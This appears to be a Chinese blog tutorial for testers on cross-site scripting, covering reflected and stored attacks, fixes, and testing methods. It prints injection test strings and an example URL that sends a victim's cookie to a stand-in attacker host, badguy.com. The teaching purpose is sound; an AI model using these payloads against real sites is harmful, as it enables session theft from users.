XSS全称(Cross Site Scripting)跨站脚本攻击,是Web程序中最常见的漏洞,指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的,比如获取用户的Cookie,导航到恶意网站,携带木马等。
作为测试人员,需要了解XSS的原理,攻击场景,如何修复,才能有效的防止XSS的发生。
阅读目录
- XSS是如何发生的的
- HTML ENcode
- XSS攻击场景
- XSS漏洞的修复
- 如何测试XSS漏洞
- HTML Encode和URL Encode的区别
- 浏览器中的XSS过滤器
- ASP.NET中的XSS安全机制
1. XSS是如何发生的呢
假如有下面一个textbox
<。input type=“text” name=“address1” value=“value1from”>
value1from是来自用户的输入,如果用户不是输入value1from,而是输入 "/><。script>alert(document.cookie)<!- 那么就会变成
<。input type=“text” name=“address1” value=""/><。script>alert(document.cookie)<!- ">
嵌入的JavaScript代码将会被执行
或者用户输入的是 "οnfοcus="alert(document.cookie) 那么就会变成
事件被触发的时候嵌入的JavaScript代码将会被执行攻击的威力,取决于用户输入了什么样的脚本
当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器,例如下图
2. HTML Encode
XSS之所以会发生,是因为用户输入的数据变成了代码,所以我们需要对用户输入的数据进行HTML Encode处理。将其中的“中括号”,“单引号”,“引号”之类的特殊字符进行编码。
在C#中已经提供了现成的方法,只要调用HttpUtilityEncode(“string<.scritp>”)就可以了,(需要引用System。Web程序集)
Fiddler中也提供了很方便的工具,点击Toolbar上的“TextWizard“按钮
3. XSS攻击场景
1.Dom-Based XSS漏洞 攻击过程如下
Tom发现了VIctim.com中的一个页面有XSS漏洞
例如:http://victim.com/search.asp?term=apple
服务器中Search.asp页面的代码大概如下
Tom先建立一个网站http://badguy.com,用来接收“偷”来的信息,然后Tom构造一个恶意的URL(如下),通过某种方式(邮件,QQ)发送给Monica
http://victim.com/search.asp?term=<。script>window.open(“http://badguy.com?cookie=”+document.cookie)<。/script>
Monica点击了这个URL,嵌入在URL中的恶意JavaScript代码就会在Monica的浏览器中执行,那么Monica在victim.com网站中的cookie,就会被发送到badbuy网站中,这样Monica在victim.com的信息就会被Tom盗了
2.Stored XSS(存储式XSS漏洞),该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,攻击过程如下
Alex发现了网站A上有一个XSS漏洞,该漏洞允许将攻击代码保存数据库中,
Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。
其他人如Monica访问这篇文章的时候,嵌入在文章中的恶意JavaScript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将Alex盗走
Dom-Based XSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户。
4.XSS漏洞修复
原则:不相信客户输入的数据
注意:攻击代码不一定在<。script><。/script>中
- 将重要的cookie标记为http,only,这样的JavaScript中的document.cookie语句就不能获取到cookie 了。
- 只允许用户输入我们期望的数据。例如:年龄的textbox中,只允许用户输入数字,而数字之外的字符都过滤掉。
- 对数据进行Html Encode处理
- 过滤或移除特殊的Html标签。 例如: <.script>, <.iframe> , < for <, > for >, " for
- 过滤JavaScript 事件的标签。例如 “οnclick=”, “onfocus” 等等。
5. 如何测试XSS漏洞
方法一:查看代码,查找关键的变量,客户端将数据传送给Web服务端一般通过三种方式Querystring,form表单,以及cookie,例如在ASP的程序中,通过Request对象获取客户的变量
<%
strUserCode = Request.QueryString(“code”);
strUser = Request.Form(“USER”);
strID = Request.Cookies(“ID”);
%>
假如变量没有经过htmlEncode处理,那么这个变量就存在一个XSS漏洞
方法二:准备测试脚本
"/><.script>alert(document.cookie)<./script><!–
<.script>alert(document.cookie)<./script><!–
"οnclick="alert(document.cookie
在网页中的Text box或者其他能输入数据的地方, 输入这些测试脚本,看能不能弹出对话框,能弹出的话2说明存在XSS漏洞
在URL中查看有哪些变量通过URL把值传给Web服务器,把这些变量的值退换成我们的测试脚本,然后看我们的脚本是否能执行
方法三:自动化测试XSS漏洞
现在已经有很多XSS扫描工具了,实现XSS自动化测试非常简单,只需要用HttpWebRequest类。包含xss测试脚本,发送给Web服务器,然后查看HttpWebResponse中,我们的XSS测试脚本是否已经注入进去了。
6. HTML Encode和URL Encode的区别
刚开始我老是把这两个东西搞混淆,其实这是两个不同的东西,HTML编码前面已经介绍过了,关于URL编码是为了符合URL的规范,因为在标准的URL规范中中文和很多的字符是不允许出现在URL中的。
例如在baidu中搜索“测试汉字”。URL会变成
http://www.baidu.com/s?wd=���Ժ���&rsv_bp=0&rsv_spt=3&inputT=7477
所谓URL编码就是“:把所有非字母数字字符都将被替换成百分号(%)后面跟两位十六进制数,空格则编码为加号(+)
在C#中已经提供了现成的方法,只要调用HttpUtility.UrlEncode(“string <.scritp>”) 就可以了。 (需要引用System.Web程序集)
Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮
7. 浏览器中的XSS过滤器
为了防止发生XSS,很多浏览器厂商都在浏览器中加入安全机制来过滤XSS,例如IE8,IE9,Firefox,Chrome,都有针对XSS的安全机制,浏览器会阻止XSS,例如下图
8. ASP.NET中的XSS安全机制
ASP.NET中有防范XSS机制,对提交的表单会自动检查是否存在XSS代码的时候,ASP.NET会抛出一个错误如下图
很多程序员对安全没有概念,甚至不知道有XSS的存在,ASP.NET在这一点上做到默认安全,这样的话就算是没有安全意识的程序员也能写出一个“较安全的网站”如果想禁止这个安全特性,可以通过<%@ Page validateRequest=“false" %>
1460
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
